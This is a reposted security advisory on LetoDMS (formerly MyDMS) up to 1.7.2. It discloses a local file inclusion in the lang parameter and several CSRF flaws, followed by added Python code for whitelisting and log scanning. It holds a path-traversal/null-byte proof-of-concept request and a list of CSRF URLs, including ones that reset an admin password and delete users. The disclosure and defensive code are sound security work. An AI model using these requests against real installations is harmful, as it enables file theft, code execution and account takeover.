LetoDMS Local File Inclusion / Cross Site Request Forgery

16 Jan 2010 | Reported by Daniel Fabian | Type: packetstorm | Source: packetstormsecurity.com

LetoDMS (formerly MyDMS) <= 1.7.2 Local File Inclusion and Cross-Site-Request-Forgery vulnerabilities

Code

```text
SEC Consult Security Advisory < 20100115-0 >
========================================================================
title: Local file inclusion/execution and multiple
Cross-Site-Request-Forgery vulnerabilities in
LetoDMS (formerly MyDMS)
products: LetoDMS (formerly MyDMS)
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
fixed version: n.a.
impact: critical
homepage: http://sourceforge.net/projects/mydms/
found: 2009-10-09
by: D. Fabian / SEC Consult / www.sec-consult.com
L. Weichselbaum / SEC Consult / www.sec-consult.com
========================================================================

Vendor description:
-------------------
MyDMS is an open-source, web-based document management system (DMS)
written in PHP with a database backend. Originally coded by Markus
Westphal, MyDMS provides document meta-data, version control, security
and easy access to your documents.

source: http://sourceforge.net/projects/mydms/


Vulnerability overview/description:
-----------------------------------
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file
inclusion. Through this vulnerability it is possible to read sensitive
data of the web server and to execute malicious PHP-code.

Furthermore there exist multiple Cross-Site-Request-Forgery
vulnerabilities which can be used to force a user/admin to execute
unwanted actions. Some of these actions are:
* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document
* Change access to a document
* Add keywords
* Add notifications
* Move folders


Proof of concept:
-----------------
File inclusion/execution
========================
If the guest-account is activated or you have a user to log in, it is
possible to include or execute files. The lang-parameter can be
modified in a malicious way. To terminate the predefined file-ending a
null-byte has to be appended after the file to be included. The
following GET-request can be used to e.g. receive the content of the
boot.ini-file on a server running Windows as operating system. This
vulnerability can also be used to execute malicious PHP-code (e.g.
PHP-code that has been written into log-files).


PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1
[...]


Cross-Site-Request-Forgery (CSRF)
=================================
The following requests can be used for CSRF-attacks:

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
&fullname=Administrator&[email protected]&comment=&userfile=
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
&groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
&groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

It is assumed that there is more functionality vulnerable to
CSRF-attacks


Vulnerable versions:
--------------------
MyDMS
* <= 1.7.2

Vendor contact timeline:
------------------------
2009-10-29: Contacting developers on SourceForge.Net and on
trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.


Solution:
---------
n.a.

Advisory URL:
-------------
https://www.sec-consult.com/advisories.html#a64


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2010
```
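As an added example (not from the advisory or the LetoDMS code base), the following Python shows the whitelist-based handling that closes the lang-parameter inclusion described above, and a scan of constructed access-log lines for the traversal/null-byte pattern the PoC request uses. LANG_DIR, the language names and the log lines are assumptions.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Assumptions (constructed, not LetoDMS's real layout): where the language
# packs live and which ones are installed.
LANG_DIR = os.path.realpath("/var/www/mydms/languages")
ALLOWED_LANGS = {"English", "German", "French"}
DEFAULT_LANG = "English"


def resolve_lang_file(lang: str) -> str:
    """Pick the language file for a user-supplied ?lang= value.
    The pattern the advisory describes amounts to include(LANG_DIR."/".$lang.".php"):
    "../" walks out of the directory and a trailing null byte truncates the
    ".php" suffix at the C-level open(). Here the request only selects a
    whitelist key and never contributes path text."""
    if lang not in ALLOWED_LANGS:  # "../../../../boot.ini\x00" fails here
        lang = DEFAULT_LANG
    real = os.path.realpath(os.path.join(LANG_DIR, lang + ".php"))
    # Defence in depth: even a bad whitelist entry may not escape LANG_DIR.
    if os.path.commonpath([real, LANG_DIR]) != LANG_DIR:
        raise ValueError("language file resolved outside LANG_DIR")
    return real


def scan_access_log(lines):
    """Return (line_no, lang) for op.Login.php requests whose lang carries
    traversal or a null byte. Expects Common Log Format (the request line is
    the first quoted field); parse_qs already decodes %00 to a NUL byte."""
    hits = []
    for no, line in enumerate(lines, 1):
        fields = line.split('"')
        if len(fields) < 2 or len(fields[1].split(" ")) < 2:
            continue
        parts = urlsplit(fields[1].split(" ")[1])
        if not parts.path.endswith("/op.Login.php"):
            continue
        for lang in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
            if any(bad in lang for bad in ("\x00", "..", "/", "\\")):
                hits.append((no, lang))
    return hits


# Constructed sample log lines, not from the advisory or any real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jan/2010:10:00:00 +0100] "GET /mydms/op/op.Login.php?login=guest&lang=English HTTP/1.1" 200 512',
    '203.0.113.5 - - [16/Jan/2010:10:00:07 +0100] "GET /mydms/op/op.Login.php?login=guest&lang=../../../../boot.ini%00 HTTP/1.1" 200 9810',
]
```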
